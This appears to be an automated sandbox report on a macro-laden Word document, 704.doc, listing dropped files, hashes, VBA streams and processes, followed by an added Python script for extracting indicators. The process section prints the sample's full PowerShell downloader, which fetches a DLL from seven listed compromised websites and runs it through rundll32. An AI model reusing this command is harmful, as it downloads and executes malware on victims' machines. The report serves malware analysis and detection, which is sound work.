      Encrypted:false
      SSDEEP:3:X:X
      MD5:32649384730B2D61C9E79D46DE589115
      SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
      SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
      SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB899D35-EEB1-4849-9BF6-6658C3435874}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):3.1478370528780375
      Encrypted:false
      SSDEEP:24:HfCemjup6uKTHuJPkTQXaHINvhSBxD+aoF:TKTOJuymfO
      MD5:582FA24D082E9486E72A1B9681CDF97B
      SHA1:CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9
      SHA-256:F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
      SHA-512:48BDDEC49E6DDE25F4BC3D28C2A8D33E7382022226DF0A836044EB1A3E69FA5A46712AE301BF478C23F686297EB5E9BD9AE2C7A29F03628706CE69BA9E08EDCA
      Malicious:false
      Reputation:low
      Preview: ../... ... . ... ... ..... . ... ... . ..... . ....... ... ..... ......... . . ... . ... ... . . ............. . ....... ... ............... ... ......... ......... . . ....... . ..... . . ... ... ... . .....................................................................................................................................................................................................................................................................................................................................@...H...\...f...h...|................................................................................................................................................................................................................................................................................................................................................L.......\. ............gd|b..........).Y...gd..T.............gd|H...............L.......\. ............gd..T.......
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):147284
      Entropy (8bit):4.421579591711272
      Encrypted:false
      SSDEEP:1536:C8HL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CkJNSc83tKBAvQVCgOtmXmLpLmB
      MD5:4E827FA2947FDADD8926FF58D42BC7E9
      SHA1:65C90AB768A1D7FBABB6F1C719110DA6FD5D9B12
      SHA-256:5CD589A641061016C526FCB4220895E8A323BB7DCC27FC6C540A9BA594A7750B
      SHA-512:3D23844999CC2DC772141B7071760A318495D9008B929229F6BDC7CDFC3AFD2B532FD39863BBAFA122C566B908E0917A7DCA0AD5D063BAE9FDDFCB1BDB2F9653
      Malicious:false
      Reputation:low
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
      C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):57856
      Entropy (8bit):4.701644950261556
      Encrypted:false
      SSDEEP:768:gkvd/MFp4Zgj+KmkyGhAQhQw4vwQAYYyWWwgekrrozS6X+W:HM/j1xXhQmkrrozS6OW
      MD5:3AD53E44E66D3E083F7DF8F643C4CA3E
      SHA1:44B4AB308D072BADDFD8C7138508F11A4FB0F9BF
      SHA-256:1CE1F8D3E16D8DB7F0B001101283CD500B3DC59073AD01400D18E6BF4F6AFCFA
      SHA-512:480174C894799065B0F1C86A1CCE51BAAE26951667DF232FFE399A7B761D0022C4DF8620D08B32C3EDF18806F2E56D8E96081E3D762235BF9092A953E03ACB53
      Malicious:true
      Yara Hits:
      • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, Author: Florian Roth
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................J....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=...F...?...@...A...B...C...D...E...8...G...H...I.......l...L...M...N...S...P...Q...R.......m...]...V...W...X...Y...Z...[...\...O...^..._...`...a...j...c...d...e...f...g...h...i...T...k...........n...o...............................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:59 2021, mtime=Mon Aug 30 20:08:59 2021, atime=Mon Nov 22 20:15:18 2021, length=136531, window=hide
      Category:dropped
      Size (bytes):973
      Entropy (8bit):4.501036887264172
      Encrypted:false
      SSDEEP:12:8n2wfq0gXg/XAlCPCHaXvB4XB/a/X+W6Dp2nEicvbIX8vs5DtZ3YilMMEpxRljKN:8HP/XT/4Imp2nveE0s5Dv3q3Qd7Qy
      MD5:0014D6DE553BD69E527052AF58AC3A74
      SHA1:B61ADCFD29FD6F5BE647FAB62F82B4D2B319C22D
      SHA-256:CC1F9F876CB4A4CF9838CE5FB0B9DF6ED8F1A16A2AB387694CD5CA1DC52A714B
      SHA-512:6FD6626E49D1D9B86B20CB21C1D024FB79E4C0C1ED9E3E688A6F63B0EA235C15BAAB38E6E46D7A3DB24BB7570B3DEBF8BDE5A78DF3D1316DDB250609384F563F
      Malicious:false
      Preview: L..................F.... .....U@.....U@....Y&.....S............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.S...vS. .704.doc.<.......S ..S .*.........................7.0.4...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\704.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):57
      Entropy (8bit):4.440640076685947
      Encrypted:false
      SSDEEP:3:bDuMJl+VomX1SVtBVov:bCJaV9y
      MD5:2B1A3D4E9531BB7AAAEEE91097C6E6C8
      SHA1:CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B
      SHA-256:7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
      SHA-512:B2ED8A04808A83A548F91A0CFA5B3D830A05EB52D6B4F436B02D3ADDF1A020DBE04252F19E778E706827A16CBB7E3ECED7BBD8E82E69096A1328E2BEFA478374
      Malicious:false
      Preview: [folders]..Templates.LNK=0..704.LNK=0..[doc]..704.LNK=0..
      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J29WGVF1UDYP81V0IINR.temp
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\Desktop\~$704.doc
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:true
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

      Static File Info

      General

      File type:Microsoft Word 2007+
      Entropy (8bit):7.953888666040384
      TrID:
      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
      • ZIP compressed archive (8000/1) 5.23%
      File name:704.doc
      File size:146367
      MD5:40f85d07da2533d576b1f2d7c043a2da
      SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
      SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
      SHA512:fb718ea1a81fdcba7c933cd55a54beeee660a7e4d5b0a1e1ee11351e40cc691dd3fb644dce60335dfea9c983fc5a4ce079b2a3349fb26c77c444c66cada454a2
      SSDEEP:3072:hAGj2SXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDve/Nk:9CSXw50+OukzVXV2uhDCG/Nk
      File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

      File Icon

      Icon Hash:e4eea2aaa4b4b4a4

      Static OLE Info

      General

      Document Type:OpenXML
      Number of OLE Files:1

      OLE File "/opt/package/joesandbox/database/analysis/526268/sample/704.doc"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:False
      Contains Word Document Stream:
      Contains Workbook/Book Stream:
      Contains PowerPoint Document Stream:
      Contains Visio Document Stream:
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Author:1
      Template:Normal.dotm
      Last Saved By:1
Revision Number:103
      Total Edit Time:211
      Create Time:2021-11-15T15:39:00Z
      Last Saved Time:2021-11-18T19:09:00Z
      Number of Pages:1
      Number of Words:16
      Number of Characters:95
      Creating Application:Microsoft Office Word
      Security:0

      Document Summary

      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:12.0000

      Streams with VBA

      VBA File Name: cvbku3gakuisdgfilu3gblaw.cls, Stream Size: 10382
      General
      Stream Path:VBA/cvbku3gakuisdgfilu3gblaw
      VBA File Name:cvbku3gakuisdgfilu3gblaw.cls
      Stream Size:10382
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 01 00 00 f0 00 00 00 9e 08 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff a7 08 00 00 3f 1b 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
      General
      Stream Path:PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:519
      Entropy:5.27637957879
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = c v b k u 3 g a k u i s d g f i l u 3 g b l a w / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B 6 7 6 B A B 8 B E B 8 B E B C C 2 B C C 2 " . .
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41
      Stream Path: PROJECTwm, File Type: data, Stream Size: 77
      General
      Stream Path:PROJECTwm
      File Type:data
      Stream Size:77
      Entropy:3.2550852567
      Base64 Encoded:False
      Data ASCII:c v b k u 3 g a k u i s d g f i l u 3 g b l a w . c . v . b . k . u . 3 . g . a . k . u . i . s . d . g . f . i . l . u . 3 . g . b . l . a . w . . . . .
      Data Raw:63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 00 00 00 00
      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4731
      General
      Stream Path:VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4731
      Entropy:4.84395391101
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
      Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      Stream Path: VBA/dir, File Type: data, Stream Size: 843
      General
      Stream Path:VBA/dir
      File Type:data
      Stream Size:843
      Entropy:6.51963251442
      Base64 Encoded:True
      Data ASCII:. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . i . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
      Data Raw:01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1a 69 8e 63 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      Behavior


      System Behavior

      General

      Start time:13:15:18
      Start date:22/11/2021
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f820000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:13:15:23
      Start date:22/11/2021
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x4ace0000
      File size:345088 bytes
      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:13:15:24
      Start date:22/11/2021
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x13ff00000
      File size:473600 bytes
      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:high
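The command line recorded above for powershell.exe is the whole downloader: it iterates a hard-coded list of seven URLs, saves the first successful response as c:\programdata\<random>.dll, and launches it through the 32-bit rundll32.exe with an export name f<random>. As an added analyst helper, not part of the Joe Sandbox report or of the sample, the Python below pulls the URLs and hosts out of that recorded command line, scores it against the behaviours the report's signatures react to (web request with -OutFile, Start-Process of rundll32, random filename under ProgramData, IEX), and parses the rundll32 child-process command line the script would produce. The indicator names, the scoring threshold and the example rundll32 line are this helper's own; the report records no network traffic and no dropped DLL, so that child process was not observed in this run and the example line is constructed.

```python
"""Extract indicators from the PowerShell downloader one-liner captured in the report.

Added analyst helper; the command line below is copied from the report's System
Behavior section, everything else (regexes, indicator names, threshold) is ours.
"""
import re
from urllib.parse import urlparse

# Command line exactly as recorded for powershell.exe (embedded so this runs offline).
CMDLINE = r'''powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj'''

# URLs in the script are comma-separated and terminated by an escaped quote (\"),
# so stop at whitespace, quotes, commas or backslashes.
URL_RE = re.compile(r'https?://[^\s",\\]+', re.IGNORECASE)

# Behaviours that, taken together, characterise this downloader. Names are ours;
# each pattern is deliberately broad so aliases (iwr, WebClient) are caught too.
INDICATORS = {
    "web_request": re.compile(r'Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient', re.I),
    "writes_to_programdata": re.compile(r'programdata', re.I),
    "random_filename": re.compile(r'Get-Random', re.I),
    "rundll32_launch": re.compile(r'rundll32\.exe', re.I),
    "start_process": re.compile(r'Start-Process', re.I),
    "invoke_expression": re.compile(r'\bIEX\b|Invoke-Expression', re.I),
}

# The payload is written as c:\programdata\<Get-Random>.dll and invoked with the
# export name f<Get-Random>. Get-Random with no arguments yields a non-negative
# 32-bit integer, hence \d+ for both values.
RUNDLL32_RE = re.compile(r'rundll32\.exe\s+c:\\programdata\\(\d+)\.dll,f(\d+)', re.I)

# Constructed example of the child process a successful download would spawn;
# the two numbers are made up, not taken from the report.
EXAMPLE_RUNDLL32 = r"c:\windows\syswow64\rundll32.exe c:\programdata\1804289383.dll,f846930886"


def extract_urls(cmdline: str) -> list[str]:
    """Every http(s) URL embedded in the command line, in script order."""
    return URL_RE.findall(cmdline)


def extract_domains(cmdline: str) -> list[str]:
    """Sorted, de-duplicated hostnames, the form most blocklists want."""
    return sorted({urlparse(u).hostname for u in extract_urls(cmdline)})


def matched_indicators(cmdline: str) -> list[str]:
    """Names of the behaviour patterns present in the command line, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def is_suspicious(cmdline: str, threshold: int = 3) -> bool:
    """A one-liner that downloads, writes a randomly named payload under ProgramData
    and launches it via rundll32 trips several indicators at once; routine admin
    commands rarely combine three of them."""
    return len(matched_indicators(cmdline)) >= threshold


def parse_rundll32_launch(cmdline: str):
    """Return (dll_path, export_name) for a rundll32 launch in this script's shape,
    or None when the command line does not match it."""
    m = RUNDLL32_RE.search(cmdline)
    if not m:
        return None
    return ("c:\\programdata\\" + m.group(1) + ".dll", "f" + m.group(2))


if __name__ == "__main__":
    for u in extract_urls(CMDLINE):
        print("url:", u)
    print("hosts:", ", ".join(extract_domains(CMDLINE)))
    print("indicators:", matched_indicators(CMDLINE))
    print("suspicious:", is_suspicious(CMDLINE))
    print("rundll32 launch:", parse_rundll32_launch(EXAMPLE_RUNDLL32))
```

The URL extractor is the part to reuse on other samples of this family: the list order matters, since the script stops at the first host that answers, so the earliest live URL is the one a victim would actually have fetched. The rundll32 regex is intentionally narrow to this script's naming scheme (numeric DLL name under ProgramData, export f<number>); hunting rules should key on the rundll32 parent being powershell.exe rather than on the exact path.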

      Disassembly

      Code Analysis
